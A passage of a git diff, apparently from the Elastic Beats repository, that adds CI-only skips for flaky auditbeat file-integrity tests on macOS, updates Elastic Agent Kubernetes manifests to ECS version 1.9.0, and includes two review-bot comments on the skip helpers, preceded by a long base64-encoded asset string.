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" + return "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" } diff --git a/auditbeat/module/file_integrity/metricset_test.go b/auditbeat/module/file_integrity/metricset_test.go index 60766d7c141..aad49679c49 100644 --- a/auditbeat/module/file_integrity/metricset_test.go +++ b/auditbeat/module/file_integrity/metricset_test.go @@ -65,6 +65,8 @@ func TestData(t *testing.T) { } func TestActions(t *testing.T) { + skipOnCIForDarwinAMD64(t) + defer abtest.SetupDataDir(t)() bucket, err := datastore.OpenBucket(bucketName) @@ -173,6 +175,8 @@ func TestActions(t *testing.T) { } func TestExcludedFiles(t *testing.T) { + skipOnCIForDarwinAMD64(t) + defer abtest.SetupDataDir(t)() bucket, err := datastore.OpenBucket(bucketName) @@ -227,6 +231,8 @@ func TestExcludedFiles(t *testing.T) { } func TestIncludedExcludedFiles(t *testing.T) { + skipOnCIForDarwinAMD64(t) + defer abtest.SetupDataDir(t)() bucket, err := datastore.OpenBucket(bucketName) 
@@ -980,3 +986,9 @@ func getConfig(path ...string) map[string]interface{} { "exclude_files": []string{`(?i)\.sw[nop]$`, `[/\\]\.git([/\\]|$)`}, } } + +func skipOnCIForDarwinAMD64(t testing.TB) { + if os.Getenv("BUILD_ID") != "" && runtime.GOOS == "darwin" && runtime.GOARCH == "amd64" { + t.Skip("Skip test on CI for darwin/amd64") + } +} diff --git a/auditbeat/tests/system/test_file_integrity.py b/auditbeat/tests/system/test_file_integrity.py index bf90a9ee38e..8b47f9b22e9 100644 --- a/auditbeat/tests/system/test_file_integrity.py +++ b/auditbeat/tests/system/test_file_integrity.py @@ -1,5 +1,6 @@ import time import unittest +import platform from auditbeat import * @@ -61,6 +62,8 @@ def wait_output(self, min_events): else: break + @unittest.skipIf(os.getenv("BUILD_ID") is not None and platform.system() == 'Darwin', + 'Flaky test: https://github.com/elastic/beats/issues/24678') def test_non_recursive(self): """ file_integrity monitors watched directories (non recursive). @@ -130,7 +133,7 @@ def test_non_recursive(self): # assert file inside subdir is not reported assert self.log_contains(file3) is False - @unittest.skip("Skipped as flaky: https://github.com/elastic/beats/issues/7731") + @unittest.skipIf(os.getenv("BUILD_ID") is not None, "Skipped as flaky: https://github.com/elastic/beats/issues/7731") def test_recursive(self): """ file_integrity monitors watched directories (recursive). diff --git a/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml index 4118e2d4e80..cf867d43ad3 100644 --- a/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml +++ b/deploy/kubernetes/elastic-agent-standalone-kubernetes.yml @@ -24,10 +24,7 @@ spec: containers: - name: elastic-agent image: docker.elastic.co/beats/elastic-agent:8.0.0 - args: [ - "-c", "/etc/agent.yml", - "-e", - ] + args: ["-c", "/etc/agent.yml", "-e"] env: - name: ES_USERNAME value: "elastic" 
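Review bot: The skip in `skipOnCIForDarwinAMD64` carries no tracking reference, so nothing records why the file_integrity tests are disabled on darwin/amd64 CI or when they can be re-enabled. The Python change later in this commit links its skip to an issue; the Go message could do the same, e.g. `t.Skip("Flaky on CI for darwin/amd64: <tracking issue URL>")`, with a doc comment such as `// skipOnCIForDarwinAMD64 skips t when BUILD_ID is set and the test runs on darwin/amd64.` The helper is called from TestActions, TestExcludedFiles and TestIncludedExcludedFiles in the earlier hunks of this file, so those three file-integrity tests no longer run on that CI platform while the skip is in place. `os` and `runtime` are used here, but the import block is outside the hunk, so confirm both are imported.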
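Review bot: Both new `skipIf` decorators in test_file_integrity.py call `os.getenv`, but the import hunk adds only `import platform`; `os` presumably reaches this module through `from auditbeat import *`. An explicit `import os` next to `import platform` keeps the decorators working if that star import ever changes. The second decorator also turns the unconditional skip of `test_recursive` into a CI-only skip, so the test linked to issue 7731 runs on developer machines again; worth confirming that is intended.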
@@ -134,7 +131,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - data_stream: dataset: system.syslog type: logs @@ -150,7 +147,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - name: container-log type: logfile use_output: default @@ -401,10 +398,7 @@ spec: containers: - name: elastic-agent image: docker.elastic.co/beats/elastic-agent:8.0.0 - args: [ - "-c", "/etc/agent.yml", - "-e", - ] + args: ["-c", "/etc/agent.yml", "-e"] env: - name: ES_USERNAME value: "elastic" @@ -659,3 +653,4 @@ metadata: labels: k8s-app: elastic-agent --- + diff --git a/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml b/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml index f7f412a5e19..17fa1c99dae 100644 --- a/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml +++ b/deploy/kubernetes/elastic-agent-standalone/elastic-agent-standalone-daemonset-configmap.yaml @@ -50,7 +50,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - data_stream: dataset: system.syslog type: logs @@ -66,7 +66,7 @@ data: - add_fields: target: '' fields: - ecs.version: 1.5.0 + ecs.version: 1.9.0 - name: container-log type: logfile use_output: default diff --git a/dev-tools/common.bash b/dev-tools/common.bash index 